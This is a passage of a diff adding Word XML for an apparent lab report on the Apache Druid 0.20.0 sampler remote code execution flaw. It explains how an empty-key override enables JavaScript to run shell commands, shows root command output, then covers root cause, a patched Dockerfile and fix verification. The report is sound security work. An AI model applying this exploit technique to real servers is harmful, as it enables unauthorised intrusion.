+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  "samplerConfig": { "numRows": 10 }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The body is reformatted here for the page; reproduce.sh in the repository carries the exact bytes. Three details matter. The firehose points at /etc/passwd, so the sampler has one row of input to work with. The function starts a shell through java.lang.Runtime and reads its standard output back into the returned record. And the empty key carries a nested object that sets enabled to true - a configuration value that the client should not be able to set at all.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The command output comes back inside the sampler response, so no out-of-band channel is needed:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">{"numRows": 1, "data": [</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">  { "timestamp": "1970-01-01T00:34:12.123Z",</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">    "test": "uid=0(root) gid=0(root) groups=0(root)" }</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">]}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The process runs as root inside the container, which is the default for the Vulhub image. Swapping the command for cat /etc/passwd returns the file content in the same field, which proves that the primitive is arbitrary command execution rather than a single-purpose trick: whatever the shell can do, the attacker can do, with the privileges of the Druid server.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:spacing w:before="120" w:after="40" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5700000" cy="3330685"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="9" name="Picture 9"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="9" name="image9.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId109"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5700000" cy="3330685"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="6E6E6E"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The sampler executes id and cat /etc/passwd through Rhino (screenshot 05)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:spacing w:before="240" w:after="120"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">9. Root cause analysis</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The defect is not a single mistyped line. It is the combination of a dangerous feature, a broken configuration guard and an endpoint that anyone can reach. Five points explain it completely.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">First, the dangerous feature is off by default, and that is the whole security model. Druid's JavaScript parsing is disabled unless the operator opts in, so the design assumes that no untrusted client can ever reach the engine. The guard is a configuration flag, not an authentication check - which means it has to hold absolutely, because nothing else stands between the network and the engine.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Second, an empty key defeats the guard. The parseSpec object is deserialised by Jackson into a configuration map. A JSON object whose key is the empty string was accepted and merged into that map, overwriting the enabled flag. A single unvalidated map key therefore downgraded a hard configuration guarantee into a client-controlled suggestion - which is exactly what CWE-732 describes: a critical resource whose permission is assigned by the wrong party.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Third, the engine has no sandbox. Once enabled, the function field is handed to Rhino, which runs inside the JVM and exposes java.lang.Runtime. JavaScript can therefore start native processes with the privileges of the server. Nothing about the feature was designed for hostile input: it was designed for an operator who trusts the data they are ingesting.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Fourth, the endpoint is unauthenticated. The sampler route is reachable without credentials, so a feature that should be off becomes unauthenticated remote code execution. Even where authentication exists, the override would still let any low-privileged user execute commands - the broken access control only amplifies the impact, it does not cause it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Fifth, the patch confirms the analysis. Version 0.20.1 rejects the empty-key override, so the JavaScript feature can no longer be forced on by a request, and the function field is never evaluated while the feature is disabled. The fix removes the root cause - the accepted override - rather than filtering payloads, which is why the primitive disappears instead of being blocked one spelling at a time.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:spacing w:before="240" w:after="120"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">10. Applied protection measures</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Because the defect is in a third-party component, the correct remediation is to run a version that contains the patch. The Compose file in fixes/ stops using the 0.20.0 image and builds a 0.20.1 server instead:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> services:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   druid:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">-    image: vulhub/apache-druid:0.20.0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+    build:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+      context: .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+      dockerfile: Dockerfile     # builds a 0.20.1 image</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Why a Dockerfile rather than a plain tag: the official apache/druid:0.20.1 image is built on a distroless base that cannot run the start-nano-quickstart launcher - it ships neither bash nor perl, which the launcher scripts require. Replacing the whole image would also change the launcher, the embedded ZooKeeper and the ports, and the comparison with the vulnerable environment would no longer be like for like. The fix therefore keeps the Vulhub 0.20.0 base and replaces only the vulnerable jars:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">FROM vulhub/apache-druid:0.20.0</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">RUN rm -f /opt/druid/lib/*-0.20.0.jar /opt/druid/extensions/*/*-0.20.0.jar</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">COPY --from=apache/druid:0.20.1 /opt/druid/ /opt/druid/</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">CMD ["/opt/druid/bin/start-nano-quickstart"]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Applied and rebuilt:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">docker compose down</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">cd ../../fixes &amp;&amp; docker compose up --build -d</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Why this is effective: the vulnerable behaviour was the accepted empty-key override. In 0.20.1 the override is rejected, so the function field of a sampler request never reaches the Rhino engine and java.lang.Runtime is no longer reachable. The patch does not guess at payloads; it removes the mechanism that let a request change a server-side setting.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">Two secondary measures are worth mentioning because they illustrate defence in depth: bind the console to localhost or put it behind an authenticating proxy, and run the container as a non-root user. Neither addresses the root cause - the override would still work for anyone who can reach the port - but they reduce the consequence from remote code execution as root to remote code execution as an unprivileged account.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading1"/>
+        <w:keepNext/>
+        <w:spacing w:before="240" w:after="120"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">11. Verification of the fix</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The verification replays exactly the request that executed code before, against the patched server, and then checks that the product still works. The second half is not optional: a fix that breaks the service is not a fix.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ ./verify_fix.sh http://127.0.0.1:8888</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">== 1. Replay the exploit (must NOT execute the command)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   body: {"error":"Failed to sample data: JavaScript is disabled"}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   [PASS] no command output - the JavaScript feature is disabled</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">== 2. Regression: the Druid console still responds</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   GET / -&gt; HTTP 302</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">RESULT: fix verified, service healthy.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The script does not look for an error code alone; it greps the response body for uid=, the signature of a successful execution. A server that returned 200 with the command output would still fail the check, and a server that returned 500 because it was broken would not pass either - the pass condition is the specific refusal message.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The regression half queries /status, which reports version 0.20.1 and confirms that the replay really ran against the patched server rather than against a container that failed to start:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">$ curl -s http://127.0.0.1:8888/status | head -c 120</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
+        <w:spacing w:before="0" w:after="60" w:line="240" w:lineRule="auto"/>
+        <w:ind w:left="120" w:firstLine="0"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">{"version":"0.20.1","modules":[{"name":"org.apache.druid.server.initialization.jetty", ...</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:spacing w:before="120" w:after="40" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5700000" cy="2231801"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="10" name="Picture 10"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="10" name="image10.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId110"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5700000" cy="2231801"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="6E6E6E"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The same request is now rejected: JavaScript is disabled (screenshot 06)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:spacing w:before="120" w:after="40" w:line="240" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0">
+            <wp:extent cx="5700000" cy="2772470"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="11" name="Picture 11"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic>
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic>
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="11" name="image11.png"/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId111"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5700000" cy="2772470"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="200"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+          <w:color w:val="6E6E6E"/>
+          <w:sz w:val="17"/>
+          <w:szCs w:val="17"/>
